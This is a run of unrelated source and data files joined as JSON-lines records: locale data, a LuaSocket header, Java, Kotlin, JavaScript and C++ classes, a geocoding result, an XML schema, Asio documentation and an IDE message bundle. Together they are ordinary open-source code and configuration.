[\n\t\t\"ムハッラム\",\n\t\t\"サフアル\",\n\t\t\"ラビー・ウル・アウワル\",\n\t\t\"ラビー・ウッ・サーニー\",\n\t\t\"ジュマーダル・アウワル\",\n\t\t\"ジュマーダッサーニー\",\n\t\t\"ラジャブ\",\n\t\t\"シャアバーン\",\n\t\t\"ラマダーン\",\n\t\t\"シャウワール\",\n\t\t\"ズル・カイダ\",\n\t\t\"ズル・ヒッジャ\"\n\t],\n\t\"timeFormat-short\": \"H:mm\",\n\t\"quarters-format-wide\": [\n\t\t\"第1四半期\",\n\t\t\"第2四半期\",\n\t\t\"第3四半期\",\n\t\t\"第4四半期\"\n\t],\n\t\"timeFormat-long\": \"H:mm:ss z\",\n\t\"field-year\": \"年\",\n\t\"field-hour\": \"時\",\n\t\"months-format-abbr\": [\n\t\t\"ムハッラム\",\n\t\t\"サフアル\",\n\t\t\"ラビー・ウル・アウワル\",\n\t\t\"ラビー・ウッ・サーニー\",\n\t\t\"ジュマーダル・アウワル\",\n\t\t\"ジュマーダッサーニー\",\n\t\t\"ラジャブ\",\n\t\t\"シャアバーン\",\n\t\t\"ラマダーン\",\n\t\t\"シャウワール\",\n\t\t\"ズル・カイダ\",\n\t\t\"ズル・ヒッジャ\"\n\t],\n\t\"timeFormat-full\": \"H時mm分ss秒 zzzz\",\n\t\"field-day-relative+0\": \"今日\",\n\t\"field-day-relative+1\": \"明日\",\n\t\"dateFormatItem-GyMMMd\": \"Gy年M月d日\",\n\t\"field-day-relative+2\": \"明後日\",\n\t\"dateFormatItem-H\": \"H時\",\n\t\"months-standAlone-abbr\": [\n\t\t\"ムハッラム\",\n\t\t\"サフアル\",\n\t\t\"ラビー・ウル・アウワル\",\n\t\t\"ラビー・ウッ・サーニー\",\n\t\t\"ジュマーダル・アウワル\",\n\t\t\"ジュマーダッサーニー\",\n\t\t\"ラジャブ\",\n\t\t\"シャアバーン\",\n\t\t\"ラマダーン\",\n\t\t\"シャウワール\",\n\t\t\"ズル・カイダ\",\n\t\t\"ズル・ヒッジャ\"\n\t],\n\t\"quarters-format-abbr\": [\n\t\t\"1Q\",\n\t\t\"2Q\",\n\t\t\"3Q\",\n\t\t\"4Q\"\n\t],\n\t\"dateFormatItem-Gy\": \"Gy年\",\n\t\"dateFormatItem-yyyyMMMEd\": \"Gy年M月d日(E)\",\n\t\"dateFormatItem-M\": \"M月\",\n\t\"dateFormatItem-yyyyMMM\": \"Gy年M月\",\n\t\"dateFormatItem-yyyyMMMd\": \"Gy年M月d日\",\n\t\"timeFormat-medium\": \"H:mm:ss\",\n\t\"dateFormatItem-Hm\": \"H:mm\",\n\t\"eraAbbr\": [\n\t\t\"AH\"\n\t],\n\t\"field-minute\": \"分\",\n\t\"field-dayperiod\": \"午前/午後\",\n\t\"dateFormatItem-d\": \"d日\",\n\t\"field-day-relative+-1\": \"昨日\",\n\t\"dateFormatItem-h\": \"aK時\",\n\t\"field-day-relative+-2\": \"一昨日\",\n\t\"dateFormatItem-MMMd\": \"M月d日\",\n\t\"dateFormatItem-MEd\": \"M/d(E)\",\n\t\"field-day\": \"日\",\n\t\"days-format-wide\": [\n\t\t\"日曜日\",\n\t\t\"月曜日\",\n\t\t\"火曜日\",\n\t\t\"水曜日\",\n\t\t\"木曜日\",\n\t\t\"金曜日\",\n\t\t\"土曜日\"\n\t],\n\t\"field-zone\": \"タイムゾーン\",\n\t\"dateFormatItem-y\": \"Gy年\",\n\t\"months-standAlone-narrow\": [\n\t\t\"1\",\n\t\t\"2\",\n\t\t\"3\",\n\t\t\"4\",\n\t\t\"5\",\n\t\t\"6\",\n\t\t\"7\",\n\t\t\"8\",\n\t\t\"9\",\n\t\t\"10\",\n\t\t\"11\",\n\t\t\"12\"\n\t],\n\t\"field-year-relative+-1\": \"昨年\",\n\t\"field-month-relative+-1\": \"先月\",\n\t\"dateFormatItem-hm\": \"aK:mm\",\n\t\"days-format-abbr\": [\n\t\t\"日\",\n\t\t\"月\",\n\t\t\"火\",\n\t\t\"水\",\n\t\t\"木\",\n\t\t\"金\",\n\t\t\"土\"\n\t],\n\t\"dateFormatItem-yyyyMd\": \"Gy/M/d\",\n\t\"field-month\": \"月\",\n\t\"days-standAlone-narrow\": [\n\t\t\"日\",\n\t\t\"月\",\n\t\t\"火\",\n\t\t\"水\",\n\t\t\"木\",\n\t\t\"金\",\n\t\t\"土\"\n\t],\n\t\"dateFormatItem-MMM\": \"M月\",\n\t\"dayPeriods-format-wide-am\": \"午前\",\n\t\"dateFormat-short\": \"Gy/MM/dd\",\n\t\"field-second\": \"秒\",\n\t\"field-month-relative+0\": \"今月\",\n\t\"field-month-relative+1\": \"翌月\",\n\t\"dateFormatItem-Ed\": \"d日(E)\",\n\t\"field-week\": \"週\",\n\t\"dateFormat-medium\": \"Gy/MM/dd\",\n\t\"field-year-relative+0\": \"今年\",\n\t\"field-week-relative+-1\": \"先週\",\n\t\"dateFormatItem-yyyyM\": \"Gy/M\",\n\t\"field-year-relative+1\": \"翌年\",\n\t\"dateFormatItem-yyyyQQQQ\": \"GyQQQQ\",\n\t\"dateFormatItem-Hms\": \"H:mm:ss\",\n\t\"dateFormatItem-hms\": \"aK:mm:ss\",\n\t\"dateFormatItem-GyMMM\": \"Gy年M月\",\n\t\"dateFormatItem-yyyy\": \"Gy年\",\n\t\"field-week-relative+0\": \"今週\",\n\t\"field-week-relative+1\": \"翌週\"\n}\n//end v1.x content\n);"} {"text": "#ifndef LUASOCKET_H\n#define LUASOCKET_H\n/*=========================================================================*\\\n* LuaSocket toolkit\n* Networking support for the Lua language\n* Diego Nehab\n* 9/11/1999\n\\*=========================================================================*/\n\n/*-------------------------------------------------------------------------* \\\n* Current socket library version\n\\*-------------------------------------------------------------------------*/\n#define LUASOCKET_VERSION \"LuaSocket 3.0-rc1\"\n#define LUASOCKET_COPYRIGHT \"Copyright (C) 1999-2013 Diego Nehab\"\n\n/*-------------------------------------------------------------------------*\\\n* This macro prefixes all exported API functions\n\\*-------------------------------------------------------------------------*/\n#ifndef LUASOCKET_API\n#ifdef _WIN32\n#define LUASOCKET_API __declspec(dllexport)\n#else\n#define LUASOCKET_API __attribute__ ((visibility (\"default\")))\n#endif\n#endif\n\n#include \"lua.h\"\n#include \"lauxlib.h\"\n#include \"compat.h\"\n\n/*-------------------------------------------------------------------------*\\\n* Initializes the library.\n\\*-------------------------------------------------------------------------*/\nLUASOCKET_API int luaopen_socket_core(lua_State *L);\n\n#endif /* LUASOCKET_H */\n"} {"text": "package com.sohu.cache.web.vo;\r\n\r\nimport java.util.Date;\r\n\r\n\r\n/**\r\n * Created by yijunzhang on 14-10-14.\r\n */\r\npublic class RedisSlowLog {\r\n\r\n /**\r\n * 慢查询id\r\n */\r\n private long id;\r\n\r\n /**\r\n * 执行时间点\r\n */\r\n private String timeStamp;\r\n\r\n /**\r\n * 慢查询执行时间(微秒)\r\n */\r\n private long executionTime;\r\n\r\n private String command;\r\n \r\n /**\r\n * 执行日期时间\r\n */\r\n private Date date;\r\n\r\n public long getId() {\r\n return id;\r\n }\r\n\r\n public void setId(long id) {\r\n this.id = id;\r\n }\r\n\r\n public String getTimeStamp() {\r\n return timeStamp;\r\n }\r\n\r\n public void setTimeStamp(String timeStamp) {\r\n this.timeStamp = timeStamp;\r\n }\r\n\r\n public long getExecutionTime() {\r\n return executionTime;\r\n }\r\n\r\n public void setExecutionTime(long executionTime) {\r\n this.executionTime = executionTime;\r\n }\r\n\r\n public String getCommand() {\r\n return command;\r\n }\r\n\r\n public void setCommand(String command) {\r\n this.command = command;\r\n }\r\n\r\n public Date getDate() {\r\n return date;\r\n }\r\n\r\n public void setDate(Date date) {\r\n this.date = date;\r\n }\r\n\r\n @Override\r\n public String toString() {\r\n return \"RedisSlowLog [id=\" + id + \", timeStamp=\" + timeStamp + \", executionTime=\" + executionTime\r\n + \", command=\" + command + \", date=\" + date + \"]\";\r\n }\r\n\r\n}\r\n"} {"text": "\r\n{\r\n \"Info\": [\r\n {\r\n \"IsSuccess\": \"True\",\r\n \"InAddress\": \"彰化縣和美鎮和線路91號\",\r\n \"InSRS\": \"EPSG:4326\",\r\n \"InFuzzyType\": \"[單雙號機制]+[最近門牌號機制]\",\r\n \"InFuzzyBuffer\": \"0\",\r\n \"InIsOnlyFullMatch\": \"False\",\r\n \"InIsLockCounty\": \"True\",\r\n \"InIsLockTown\": \"False\",\r\n \"InIsLockVillage\": \"False\",\r\n \"InIsLockRoadSection\": \"False\",\r\n \"InIsLockLane\": \"False\",\r\n \"InIsLockAlley\": \"False\",\r\n \"InIsLockArea\": \"False\",\r\n \"InIsSameNumber_SubNumber\": \"True\",\r\n \"InCanIgnoreVillage\": \"True\",\r\n \"InCanIgnoreNeighborhood\": \"True\",\r\n \"InReturnMaxCount\": \"0\",\r\n \"OutTotal\": \"1\",\r\n \"OutMatchType\": \"完全比對\",\r\n \"OutMatchCode\": \"[彰化縣]\\tFULL:1\",\r\n \"OutTraceInfo\": \"[彰化縣]\\t { 完全比對 } 找到符合的門牌地址\"\r\n }\r\n ],\r\n \"AddressList\": [\r\n {\r\n \"FULL_ADDR\": \"彰化縣和美鎮和西里23鄰和線路91號\",\r\n \"COUNTY\": \"彰化縣\",\r\n \"TOWN\": \"和美鎮\",\r\n \"VILLAGE\": \"和西里\",\r\n \"NEIGHBORHOOD\": \"23鄰\",\r\n \"ROAD\": \"和線路\",\r\n \"SECTION\": \"\",\r\n \"LANE\": \"\",\r\n \"ALLEY\": \"\",\r\n \"SUB_ALLEY\": \"\",\r\n \"TONG\": \"\",\r\n \"NUMBER\": \"91號\",\r\n \"X\": 120.492508,\r\n \"Y\": 24.114519\r\n }\r\n ]\r\n}"} {"text": "\n\n\n\n \n \n See http://www.w3.org/XML/1998/namespace.html and\n http://www.w3.org/TR/REC-xml for information about this namespace.\n\n This schema document describes the XML namespace, in a form\n suitable for import by other schema documents.\n\n Note that local names in this namespace are intended to be defined\n only by the World Wide Web Consortium or its subgroups. The\n following names are currently defined in this namespace and should\n not be used with conflicting semantics by any Working Group,\n specification, or document instance:\n\n base (as an attribute name): denotes an attribute whose value\n provides a URI to be used as the base for interpreting any\n relative URIs in the scope of the element on which it\n appears; its value is inherited. This name is reserved\n by virtue of its definition in the XML Base specification.\n\n lang (as an attribute name): denotes an attribute whose value\n is a language code for the natural language of the content of\n any element; its value is inherited. This name is reserved\n by virtue of its definition in the XML specification.\n\n space (as an attribute name): denotes an attribute whose\n value is a keyword indicating what whitespace processing\n discipline is intended for the content of the element; its\n value is inherited. This name is reserved by virtue of its\n definition in the XML specification.\n\n Father (in any context at all): denotes Jon Bosak, the chair of\n the original XML Working Group. This name is reserved by\n the following decision of the W3C XML Plenary and\n XML Coordination groups:\n\n In appreciation for his vision, leadership and dedication\n the W3C XML Plenary on this 10th day of February, 2000\n reserves for Jon Bosak in perpetuity the XML name\n xml:Father\n \n \n\n \n This schema defines attributes and an attribute group\n suitable for use by\n schemas wishing to allow xml:base, xml:lang or xml:space attributes\n on elements they define.\n\n To enable this, such a schema must import this schema\n for the XML namespace, e.g. as follows:\n <schema . . .>\n . . .\n <import namespace=\"http://www.w3.org/XML/1998/namespace\"\n schemaLocation=\"http://www.w3.org/2001/03/xml.xsd\"/>\n\n Subsequently, qualified reference to any of the attributes\n or the group defined below will have the desired effect, e.g.\n\n <type . . .>\n . . .\n <attributeGroup ref=\"xml:specialAttrs\"/>\n\n will define a type which will schema-validate an instance\n element with any of those attributes\n \n\n \n\n \n In keeping with the XML Schema WG's standard versioning\n policy, this schema document will persist at\n http://www.w3.org/2001/03/xml.xsd.\n At the date of issue it can also be found at\n http://www.w3.org/2001/xml.xsd.\n The schema document at that URI may however change in the future,\n in order to remain compatible with the latest version of XML Schema\n itself. In other words, if the XML Schema namespace changes, the version\n of this document at\n http://www.w3.org/2001/xml.xsd will change\n accordingly; the version at\n http://www.w3.org/2001/03/xml.xsd will not change.\n \n \n\n \n \n In due course, we should install the relevant ISO 2- and 3-letter\n codes as the enumerated possible values . . .\n \n\n \n \n\n \n \n \n \n \n \n\n \n \n\n \n \n See http://www.w3.org/TR/xmlbase/ for\n information about this attribute.\n \n \n \n\n \n \n \n \n \n\n\n"} {"text": "// Copyright 2009 the Sputnik authors. All rights reserved.\n// This code is governed by the BSD license found in the LICENSE file.\n\n/*---\ninfo: Sanity test for \"catch(Indetifier) statement\"\nes5id: 12.14_A4\ndescription: Checking if deleting an exception fails\nflags: [noStrict]\n---*/\n\n// CHECK#1\ntry {\n throw \"catchme\";\n $ERROR('#1.1: throw \"catchme\" lead to throwing exception');\n}\ncatch (e) {\n if (delete e){\n $ERROR('#1.2: Exception has DontDelete property');\n }\n if (e!==\"catchme\") {\n $ERROR('#1.3: Exception === \"catchme\". Actual: Exception ==='+ e );\n }\n}\n\n// CHECK#2\ntry {\n throw \"catchme\";\n $ERROR('#2.1: throw \"catchme\" lead to throwing exception');\n}\ncatch(e){}\ntry{\n e;\n $ERROR('#2.2: Deleting catching exception after ending \"catch\" block');\n}\ncatch(err){}\n"} {"text": "const LedControl = require(\"./ledcontrol\");\n\nclass Matrix extends LedControl {\n constructor(options) {\n options.isMatrix = true;\n super(options);\n }\n\n static get CHARS() {\n return LedControl.MATRIX_CHARS;\n }\n}\n\nmodule.exports = Matrix;\n"} {"text": "package io.github.chrislo27.rhre3.oopsies\n\nimport java.util.*\n\n/**\n * Supports undoing and redoing on this instance.\n * @param maxItems Max items, <= 0 is infinite\n * @param SELF The real impl\n */\n@Suppress(\"UNCHECKED_CAST\")\nopen class ActionHistory>(val maxItems: Int = 128) {\n\n private fun createDeque(): Deque> {\n return ArrayDeque()\n }\n\n private val undos: Deque> = createDeque()\n private val redos: Deque> = createDeque()\n\n /**\n * Mutate this object, adding the action on the undo stack, and clearing all redos.\n */\n fun mutate(action: ReversibleAction) {\n addActionWithoutMutating(action)\n\n action.redo(this as SELF)\n }\n\n /**\n * Adds an action without calling the redo method of the action.\n */\n fun addActionWithoutMutating(action: ReversibleAction) {\n redos.clear()\n undos.push(action)\n }\n\n fun ensureCapacity() {\n if (maxItems > 0) {\n if (undos.size > maxItems) {\n undos.removeLast()\n }\n\n if (redos.size > maxItems) {\n redos.removeLast()\n }\n }\n }\n\n fun undo(): Boolean {\n if (!canUndo()) return false\n\n val action = undos.pop()\n action.undo(this as SELF)\n\n redos.push(action)\n\n return true\n }\n\n fun redo(): Boolean {\n if (!canRedo()) return false\n\n val action = redos.pop()\n action.redo(this as SELF)\n\n undos.push(action)\n\n return true\n }\n\n fun canUndo() = undos.size > 0\n\n fun canRedo() = redos.size > 0\n\n fun clear() {\n undos.clear()\n redos.clear()\n }\n\n fun getUndoStack() = undos\n fun getRedoStack() = redos\n\n}\n"} {"text": "/* map_type.h\n *\n * Micropolis, Unix Version. This game was released for the Unix platform\n * in or about 1990 and has been modified for inclusion in the One Laptop\n * Per Child program. Copyright (C) 1989 - 2007 Electronic Arts Inc. If\n * you need assistance with this program, you may contact:\n * http://wiki.laptop.org/go/Micropolis or email micropolis@laptop.org.\n *\n * This program is free software: you can redistribute it and/or modify\n * it under the terms of the GNU General Public License as published by\n * the Free Software Foundation, either version 3 of the License, or (at\n * your option) any later version.\n *\n * This program is distributed in the hope that it will be useful, but\n * WITHOUT ANY WARRANTY; without even the implied warranty of\n * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n * General Public License for more details. You should have received a\n * copy of the GNU General Public License along with this program. If\n * not, see .\n *\n * ADDITIONAL TERMS per GNU GPL Section 7\n *\n * No trademark or publicity rights are granted. This license does NOT\n * give you any right, title or interest in the trademark SimCity or any\n * other Electronic Arts trademark. You may not distribute any\n * modification of this program using the trademark SimCity or claim any\n * affliation or association with Electronic Arts Inc. or its employees.\n *\n * Any propagation or conveyance of this program must include this\n * copyright notice and these terms.\n *\n * If you convey this program (or any modifications of it) and assume\n * contractual liability for the program to recipients of it, you agree\n * to indemnify Electronic Arts for any liability that those contractual\n * assumptions impose on Electronic Arts.\n *\n * You may not misrepresent the origins of this program; modified\n * versions of the program must be marked as such and not identified as\n * the original program.\n *\n * This disclaimer supplements the one included in the General Public\n * License. TO THE FULLEST EXTENT PERMISSIBLE UNDER APPLICABLE LAW, THIS\n * PROGRAM IS PROVIDED TO YOU \"AS IS,\" WITH ALL FAULTS, WITHOUT WARRANTY\n * OF ANY KIND, AND YOUR USE IS AT YOUR SOLE RISK. THE ENTIRE RISK OF\n * SATISFACTORY QUALITY AND PERFORMANCE RESIDES WITH YOU. ELECTRONIC ARTS\n * DISCLAIMS ANY AND ALL EXPRESS, IMPLIED OR STATUTORY WARRANTIES,\n * INCLUDING IMPLIED WARRANTIES OF MERCHANTABILITY, SATISFACTORY QUALITY,\n * FITNESS FOR A PARTICULAR PURPOSE, NONINFRINGEMENT OF THIRD PARTY\n * RIGHTS, AND WARRANTIES (IF ANY) ARISING FROM A COURSE OF DEALING,\n * USAGE, OR TRADE PRACTICE. ELECTRONIC ARTS DOES NOT WARRANT AGAINST\n * INTERFERENCE WITH YOUR ENJOYMENT OF THE PROGRAM; THAT THE PROGRAM WILL\n * MEET YOUR REQUIREMENTS; THAT OPERATION OF THE PROGRAM WILL BE\n * UNINTERRUPTED OR ERROR-FREE, OR THAT THE PROGRAM WILL BE COMPATIBLE\n * WITH THIRD PARTY SOFTWARE OR THAT ANY ERRORS IN THE PROGRAM WILL BE\n * CORRECTED. NO ORAL OR WRITTEN ADVICE PROVIDED BY ELECTRONIC ARTS OR\n * ANY AUTHORIZED REPRESENTATIVE SHALL CREATE A WARRANTY. SOME\n * JURISDICTIONS DO NOT ALLOW THE EXCLUSION OF OR LIMITATIONS ON IMPLIED\n * WARRANTIES OR THE LIMITATIONS ON THE APPLICABLE STATUTORY RIGHTS OF A\n * CONSUMER, SO SOME OR ALL OF THE ABOVE EXCLUSIONS AND LIMITATIONS MAY\n * NOT APPLY TO YOU.\n */\n\n/** @file map_type.h Map data structures */\n\n\n////////////////////////////////////////////////////////////////////////\n// Constants\n\n\n/**\n * Size of the world in horizontal direction.\n */\nstatic const int WORLD_W = 120;\n\n/**\n * Size of the world in vertical direction.\n */\nstatic const int WORLD_H = 100;\n\n\n////////////////////////////////////////////////////////////////////////\n// Template class definitions\n\n\n/**\n * Generic class for maps in the Micropolis game.\n *\n * A map is assumed to cover a 2D grid of #WORLD_W times #WORLD_H positions.\n * A block of positions may be clustered, and represented by a single data\n * value.\n * @tparam DATA Data type of a data value.\n * @tparam BLKSIZE Size of the cluster.\n */\ntemplate \nclass Map\n{\npublic:\n Map(DATA defaultValue);\n Map(const Map& map);\n Map& operator=(const Map &map);\n ~Map();\n\n /** Size of a cluster in number of world positions. */\n const int MAP_BLOCKSIZE;\n const int MAP_W; ///< Number of clusters in horizontal direction.\n const int MAP_H; ///< Number of clusters in vertical direction.\n\n void fill(DATA val);\n void clear();\n\n inline void set(int x, int y, DATA val);\n inline DATA get(int x, int y) const;\n inline bool onMap(int x, int y) const;\n\n inline void worldSet(int x, int y, DATA val);\n inline DATA worldGet(int x, int y) const;\n inline bool worldOnMap(int x, int y) const;\n\n DATA *getBase();\n\nprivate:\n /** Data fields of the map in column-major mode. */\n DATA _mapData[((WORLD_W + BLKSIZE - 1) / BLKSIZE)\n * ((WORLD_H + BLKSIZE -1) / BLKSIZE)];\n\n const DATA _MAP_DEFAULT_VALUE; ///< Default value of a cluster.\n};\n\n\n/**\n * Generic map constructor.\n * @param defaultValue Default value to use for off-map positions, and\n * for clearing the map.\n */\ntemplate \nMap::Map(DATA defaultValue):\n MAP_BLOCKSIZE(BLKSIZE),\n MAP_W((WORLD_W + BLKSIZE - 1) / BLKSIZE),\n MAP_H((WORLD_H + BLKSIZE - 1) / BLKSIZE),\n _MAP_DEFAULT_VALUE(defaultValue)\n{\n}\n\n\n/** Copy constructor */\ntemplate \nMap::Map(const Map &map):\n MAP_BLOCKSIZE(BLKSIZE),\n MAP_W((WORLD_W + BLKSIZE - 1) / BLKSIZE),\n MAP_H((WORLD_H + BLKSIZE - 1) / BLKSIZE),\n _MAP_DEFAULT_VALUE(map._MAP_DEFAULT_VALUE)\n{\n for (int i = 0; i < this->MAP_W * this->MAP_H; i++) {\n this->_mapData[i] = map._mapData[i];\n }\n}\n\n\n/** Assignment operator */\ntemplate \nMap &Map::operator=(const Map &map)\n{\n if(this != &map) {\n for (int i = 0; i < this->MAP_W * this->MAP_H; i++) {\n this->_mapData[i] = map._mapData[i];\n }\n }\n return *this;\n}\n\n\n/** Generic map destructor */\ntemplate \nMap::~Map()\n{\n}\n\n\n/**\n * Generic fill routine.\n *\n * @param value Value with which to fill the map.\n */\ntemplate \nvoid Map::fill(DATA value)\n{\n for (int i = 0; i < this->MAP_W * this->MAP_H; i++) {\n this->_mapData[i] = value;\n }\n}\n\n\n/**\n * Generic clear routine.\n *\n * Resets all data of the map to #_MAP_DEFAULT_VALUE.\n */\ntemplate \nvoid Map::clear()\n{\n fill(this->_MAP_DEFAULT_VALUE);\n}\n\n\n/**\n * Return the base address of the map data.\n * @note Data is stored in column-major mode.\n */\ntemplate \nDATA *Map::getBase()\n{\n return this->_mapData;\n}\n\n\n/**\n * Set the value of a cluster.\n *\n * If the coordinate is off the map, the value is not stored.\n * @param x X cluster position (at world position \\a x * #MAP_BLOCKSIZE).\n * @param y Y cluster position (at world position \\a y * #MAP_BLOCKSIZE).\n * @param value Value to use.\n */\ntemplate \ninline void Map::set(int x, int y, DATA value)\n{\n if(this->onMap(x, y)) {\n this->_mapData[x * MAP_H + y] = value;\n }\n}\n\n\n/**\n * Return the value of a cluster.\n *\n * If the coordinate is off the map, the #_MAP_DEFAULT_VALUE is returned.\n * @param x X cluster position (at world position \\a x * #MAP_BLOCKSIZE).\n * @param y Y cluster position (at world position \\a y * #MAP_BLOCKSIZE).\n * @return Value of the cluster.\n */\ntemplate \ninline DATA Map::get(int x, int y) const\n{\n if(!this->onMap(x, y)) {\n return this->_MAP_DEFAULT_VALUE;\n }\n\n return this->_mapData[x * MAP_H + y];\n}\n\n\n/**\n * Verify that cluster coordinates are within map boundaries.\n * @param x X cluster position (at world position \\a x * #MAP_BLOCKSIZE).\n * @param y Y cluster position (at world position \\a y * #MAP_BLOCKSIZE).\n * @return Coordinate is within map boundaries.\n */\ntemplate \ninline bool Map::onMap(int x, int y) const\n{\n return (x >= 0 && x < this->MAP_W) && (y >= 0 && y < this->MAP_H);\n}\n\n\n/**\n * Set the value of a cluster.\n *\n * If the coordinate is off the map, the value is not stored.\n * @param x X world position.\n * @param y Y world position.\n * @param value Value to use.\n */\ntemplate \ninline void Map::worldSet(int x, int y, DATA value)\n{\n if(this->worldOnMap(x, y)) {\n x /= BLKSIZE;\n y /= BLKSIZE;\n this->_mapData[x * MAP_H + y] = value;\n }\n}\n\n\n/**\n * Return the value of a cluster.\n *\n * If the coordinate is off the map, the #_MAP_DEFAULT_VALUE is returned.\n * @param x X world position.\n * @param y Y world position.\n * @return Value of the cluster.\n */\ntemplate \ninline DATA Map::worldGet(int x, int y) const\n{\n if(!this->worldOnMap(x, y)) {\n return this->_MAP_DEFAULT_VALUE;\n }\n\n x /= BLKSIZE;\n y /= BLKSIZE;\n return this->_mapData[x * MAP_H + y];\n}\n\n\n/**\n * Verify that world coordinates are within map boundaries.\n * @param x X world position.\n * @param y Y world position.\n * @return Coordinate is within map boundaries.\n */\ntemplate \ninline bool Map::worldOnMap(int x, int y) const\n{\n return (x >= 0 && x < WORLD_W) && (y >= 0 && y < WORLD_H);\n}\n\n\n////////////////////////////////////////////////////////////////////////\n// Type definitions\n\n\ntypedef Map MapByte1; ///< Map of ::Byte, with cluster size 1\ntypedef Map MapByte2; ///< Map of ::Byte, with cluster size 2\ntypedef Map MapByte4; ///< Map of ::Byte, with cluster size 4\ntypedef Map MapShort8; ///< Map of ::short, with cluster size 8\n\n\n////////////////////////////////////////////////////////////////////////\n"} {"text": "\n\n\nbasic_raw_socket::close (1 of 2 overloads)\n\n\n\n\n\n\n\n\n
\"asio
\n


\n
\n\"Prev\"\"Up\"\"Home\"\"Next\"\n
\n
\n\n

\n Inherited from basic_socket.\n

\n

\n Close the socket.\n

\n
void close();\n
\n

\n This function is used to close the socket. Any asynchronous send, receive\n or connect operations will be cancelled immediately, and will complete\n with the asio::error::operation_aborted error.\n

\n
\n\n Exceptions\n
\n
\n

\n
\n
asio::system_error
\n

\n Thrown on failure. Note that, even if the function indicates an\n error, the underlying descriptor is closed.\n

\n
\n
\n
\n\n Remarks\n
\n

\n For portable behaviour with respect to graceful closure of a connected\n socket, call shutdown() before closing the socket.\n

\n
\n\n\n\n
Copyright © 2003-2019 Christopher M. Kohlhoff

\n Distributed under the Boost Software License, Version 1.0. (See accompanying\n file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)\n

\n
\n
\n
\n\"Prev\"\"Up\"\"Home\"\"Next\"\n
\n\n\n"} {"text": "error.hint.file.is.readonly=\\u6587\\u4ef6 {0} \\u662f\\u53ea\\u8bfb\\u7684\nerror.dialog.readonly.file.title=\\u6587\\u4ef6\\u662f\\u53ea\\u8bfb\\u7684\nerror.dialog.readonly.files.title=\\u65e0\\u6cd5\\u4fee\\u6539\\u53ea\\u8bfb\\u6587\\u4ef6\nerror.dialog.readonly.files.message={0} \\u5305\\u542b\\u53ea\\u8bfb\\u6587\\u4ef6\\u3002\\n\\u5904\\u7406\\u6240\\u6709\\u5176\\u4ed6(\\u53ef\\u5199)\\u6587\\u4ef6\\uff1f\nreformat.directory.dialog.options=\\u9009\\u9879\nreformat.directory.dialog.filters=\\u8fc7\\u6ee4\\u5668\nprocess.scope.directory=\\u76ee\\u5f55 ''{0}''\nprocess.scope.project=\\u9879\\u76ee ''{0}''\nprocess.scope.module=\\u6a21\\u5757 ''{0}''\nprocess.scope.changed.files=\\u53ea\\u5904\\u7406 VCS \\u66f4\\u6539\\u7684\\u6587\\u4ef6\nreformat.code.accept.button.text=Run\nprocess.scope.file=\\u6587\\u4ef6 {0}(&F)\nreformat.option.selected.text=\\u6240\\u9009\\u6587\\u672c(&S)\nreformat.option.all.files.in.directory=\\u76ee\\u5f55 {0} \\u4e2d\\u7684\\u6240\\u6709\\u6587\\u4ef6(&A)\nreformat.option.include.subdirectories=\\u5305\\u542b\\u5b50\\u76ee\\u5f55(&I)\nreformat.option.optimize.imports=\\u4f18\\u5316\\u5bfc\\u5165(&O)\nreformat.option.code.cleanup=\\u6e05\\u7406\\u4ee3\\u7801(&C)\nreformat.option.rearrange.entries=\\u91cd\\u65b0\\u6392\\u5e8f\\u6761\\u76ee(&R)\nreformat.option.vcs.changed.region=\\u4ec5 VCS \\u6539\\u53d8\\u7684\\u6587\\u672c(&V)\nreformat.progress.file.with.known.name.text=\\u91cd\\u65b0\\u683c\\u5f0f\\u5316 {0}\nreformat.and.optimize.progress.common.text=\\u51c6\\u5907\\u5bfc\\u5165...\nreformat.progress.common.text=\\u91cd\\u65b0\\u683c\\u5f0f\\u5316\\u4ee3\\u7801...\nconfigure.code.style.on.fragment.dialog.title=\\u8c03\\u6574\\u4ee3\\u7801\\u6837\\u5f0f\\u8bbe\\u7f6e\nconfigure.code.style.on.fragment.dialog.cancel=\\u8df3\\u8fc7\nconfigure.code.style.on.fragment.dialog.progress.text=\\u5f71\\u54cd\\u9009\\u5b9a\\u4ee3\\u7801\\u7247\\u6bb5\\u7684\\u8fc7\\u6ee4\\u8bbe\\u7f6e...\nconfigure.code.style.on.fragment.dialog.progress.text.under=\\u6309 '\\u8df3\\u8fc7' \\u663e\\u793a\\u6240\\u6709\\u8bbe\\u7f6e\nprocess.optimize.imports=\\u4f18\\u5316\\u5bfc\\u5165\nprocess.optimize.imports.before.commit=\\u63d0\\u4ea4\\u524d\\u4f18\\u5316\\u5bfc\\u5165\nprogress.text.optimizing.imports=\\u4f18\\u5316\\u5bfc\\u5165...\nprogress.reformat.and.optimize.common.command.text=\\u683c\\u5f0f\\u5316\\u53ca\\u4f18\\u5316\\u5bfc\\u5165\nprogress.reformat.stage.wrapping.blocks=\\u51c6\\u5907\\u4e2d...\nprogress.reformat.stage.processing.blocks=\\u8ba1\\u7b97\\u66f4\\u6539...\nprogress.reformat.stage.applying.changes=\\u5b58\\u50a8\\u66f4\\u6539...\nprogress.reformat.stage.expanding.children.indents=\\u6269\\u5927\\u5fc5\\u8981\\u7684\\u5b50\\u9879\\u7f29\\u8fdb\nprocess.cleanup.code=\\u6e05\\u7406\\u4ee3\\u7801...\nprocess.rearrange.code=\\u91cd\\u65b0\\u6392\\u5217\\u4ee3\\u7801...\nprocess.reformat.code=\\u91cd\\u65b0\\u683c\\u5f0f\\u5316\\u4ee3\\u7801\nprocess.reformat.code.before.commit=\\u63d0\\u4ea4\\u524d\\u91cd\\u65b0\\u683c\\u5f0f\\u5316\\u4ee3\\u7801\nprocess.rearrange.code.before.commit=\\u63d0\\u4ea4\\u4e4b\\u524d\\u91cd\\u65b0\\u6392\\u5217\\u4ee3\\u7801\ndialog.reformat.files.title=\\u91cd\\u65b0\\u683c\\u5f0f\\u5316\\u6587\\u4ef6\ndialog.reformat.files.optimize.imports.checkbox=\\u4f18\\u5316\\u5bfc\\u5165(&O)\ndialog.reformat.files.reformat.selected.files.label=\\u91cd\\u65b0\\u683c\\u5f0f\\u5316\\u6240\\u9009\\u6587\\u4ef6\\uff1f\ncommand.name.typing=\\u8f93\\u5165\ndialog.import.on.paste.title=\\u9009\\u62e9\\u8981\\u5bfc\\u5165\\u7684\\u7c7b\ndialog.import.on.paste.title2=\\u9009\\u62e9\\u8981\\u5bfc\\u5165\\u7684\\u5143\\u7d20\ndialog.import.on.paste.title3=\\u9009\\u62e9\\u8981\\u79fb\\u9664\\u7684\\u5bf